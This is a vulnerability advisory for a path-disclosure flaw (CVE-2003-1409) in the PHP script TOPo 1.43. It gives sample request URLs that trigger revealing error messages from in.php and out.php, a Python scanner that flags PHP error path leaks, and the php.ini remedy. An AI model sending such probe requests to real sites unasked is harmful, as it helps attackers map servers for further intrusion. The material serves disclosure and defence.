TOPo Remote Path Disclosure Vulnerability


Vulnerability ID: 1107181
Vulnerability type: Information disclosure
Published: 2003-02-04
Updated: 2003-12-31
CVE ID: CVE-2003-1409
CNNVD-ID: CNNVD-200312-208
Platform: PHP
CVSS score: 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/22222
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-208
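|Vulnerability details
TOPo version 1.43 contains a vulnerability. A remote attacker can obtain sensitive information by sending an HTTP request with invalid parameters to (1) in.php or (2) out.php; the resulting error message may disclose the path of the TOPo directory.
|Exploit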
source: http://www.securityfocus.com/bid/6768/info

It has been reported that TOPo may return information to users that is sensitive in nature. Under some circumstances, it is possible to produce an error message that reveals information about the web directory structure. This could result in a more organized attack against system resources.

http://www.example.com/[top_path]/in.php?
http://www.example.com/[top_path]/out.php?
http://www.example.com/[top_path]/in.php?id=any_word
http://www.example.com/[top_path]/out.php?id=any_word
http://www.example.com/[top_path]/in.php?any_word
http://www.example.com/[top_path]/out.php?any_word
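
An added defensive check, not part of the original advisory: it scans HTTP response bodies for PHP's default error-message layout, which is how a directory path like the one described above ends up in a served page. The sample responses and paths are constructed, and the code assumes the error text follows PHP's standard "in <file> on line <N>" format.

```python
import re

# PHP's default error output, HTML or plain text, has the shape
#   <b>Warning</b>:  message in <b>/abs/path/file.php</b> on line <b>N</b>
PHP_ERROR = re.compile(
    r"(?:<b>)?(Fatal error|Parse error|Warning|Notice|Deprecated)(?:</b>)?:\s+"
    r".*?\s+in\s+(?:<b>)?((?:/|[A-Za-z]:[\\/])[^<\r\n]*?)(?:</b>)?"
    r"\s+on\s+line\s+(?:<b>)?(\d+)"
)


def find_path_leaks(body):
    """Return (level, file_path, line_no) for every PHP error in a response body."""
    return [(m.group(1), m.group(2), int(m.group(3)))
            for m in PHP_ERROR.finditer(body)]


def leaked_directories(bodies):
    """Map each leaked directory to the sorted list of pages that exposed it."""
    dirs = {}
    for page, body in bodies.items():
        for _level, path, _line in find_path_leaks(body):
            # Drop the final path component (POSIX or Windows separator).
            directory = re.sub(r"[\\/][^\\/]*$", "", path)
            dirs.setdefault(directory, set()).add(page)
    return {d: sorted(p) for d, p in dirs.items()}


# Constructed sample responses (not captured from a real TOPo install).
SAMPLE_RESPONSES = {
    "in.php?id=any_word": (
        "<br />\n<b>Warning</b>:  Division by zero in "
        "<b>/home/site/public_html/topo/in.php</b> on line <b>27</b><br />\n"
    ),
    "out.php?any_word": (
        "Notice: Undefined index: id in "
        "/home/site/public_html/topo/out.php on line 12\n"
    ),
    "index.php": "<html><body>Top sites</body></html>",
}

if __name__ == "__main__":
    for directory, pages in leaked_directories(SAMPLE_RESPONSES).items():
        print(f"path disclosed: {directory} (via {', '.join(pages)})")
```

Where this check fires, the usual remedy is `display_errors = Off` with `log_errors = On` in php.ini, so errors go to the server log instead of the response.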
|References

Source: BUGTRAQ
Name: 20030204 TOPo 1.43 and prior - Path Disclosure (in.php, out.php)
Link: http://archives.neohapsis.com/archives/bugtraq/2003-02/0049.html
Source: XF
Name: topo-path-disclosure(11248)
Link: http://xforce.iss.net/xforce/xfdb/11248
Source: BID
Name: 6768
Link: http://www.securityfocus.com/bid/6768
Source: SECUNIA
Name: 8008
Link: http://secunia.com/advisories/8008
